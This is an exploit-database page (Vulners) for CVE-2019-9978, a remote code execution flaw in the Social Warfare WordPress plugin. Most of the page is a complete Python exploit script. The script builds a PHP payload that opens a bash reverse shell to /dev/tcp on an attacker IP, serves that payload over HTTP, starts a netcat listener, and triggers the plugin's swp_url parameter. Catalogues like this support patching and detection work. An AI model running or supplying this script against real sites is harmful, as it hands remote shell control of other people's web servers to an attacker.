Vulners
Lucene search
📄 WordPress Social Warfare 3.5.2 Remote Code Execution
10
#!/usr/bin/env python3
#
#*Exploit Title*: CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin (<= 3.5.2)
#*Date*: 2025-05-20
#*Exploit Author*: Huseyin Mardinli
#*Vendor Homepage*: https://warfareplugins.com/
#*Software Link*: https://wordpress.org/plugins/social-warfare/
#*Version*: <= 3.5.2
#*Tested on*: Apache, Ubuntu 20.04
#*CVE*: CVE-2019-9978
#
import requests
import threading
import http.server
import socketserver
import os
import subprocess
import time
# --- Config ---
TARGET_URL = "http://example.com"
ATTACKER_IP = "192.168.26.130" # Change to your attack box IP
HTTP_PORT = 8000
LISTEN_PORT = 4444
PAYLOAD_FILE = "payload.txt"
def create_payload():
"""Write exact reverse shell payload using valid PHP syntax"""
payload = f'<pre>system("bash -c \\"bash -i >& /dev/tcp/{ATTACKER_IP}/{LISTEN_PORT} 0>&1\\"")</pre>'
with open(PAYLOAD_FILE, "w") as f:
f.write(payload)
print(f"[+] Payload written to {PAYLOAD_FILE}")
def start_http_server():
"""Serve payload over HTTP"""
handler = http.server.SimpleHTTPRequestHandler
with socketserver.TCPServer(("", HTTP_PORT), handler) as httpd:
print(f"[+] HTTP server running at port {HTTP_PORT}")
httpd.serve_forever()
def start_listener():
"""Start Netcat listener"""
print(f"[+] Listening on port {LISTEN_PORT} for reverse shell...")
subprocess.call(["nc", "-lvnp", str(LISTEN_PORT)])
def send_exploit():
"""Trigger the exploit with vulnerable parameter"""
payload_url = f"http://{ATTACKER_IP}:{HTTP_PORT}/{PAYLOAD_FILE}"
exploit = f"{TARGET_URL}/wp-admin/admin-post.php?swp_debug=load_options&swp_url={payload_url}"
print(f"[+] Sending exploit: {exploit}")
try:
requests.get(exploit, timeout=5)
except requests.exceptions.RequestException:
pass
def main():
create_payload()
# Start web server in background
http_thread = threading.Thread(target=start_http_server, daemon=True)
http_thread.start()
time.sleep(2) # Give server time to start
# Start listener in background
listener_thread = threading.Thread(target=start_listener)
listener_thread.start()
time.sleep(1)
# Send the malicious request
send_exploit()
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print("[-] Interrupted by user.")Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Jun 2025 00:00Current
8.4High risk
Vulners AI Score8.4
CVSS 24.3
CVSS 3.16.1
EPSS0.88711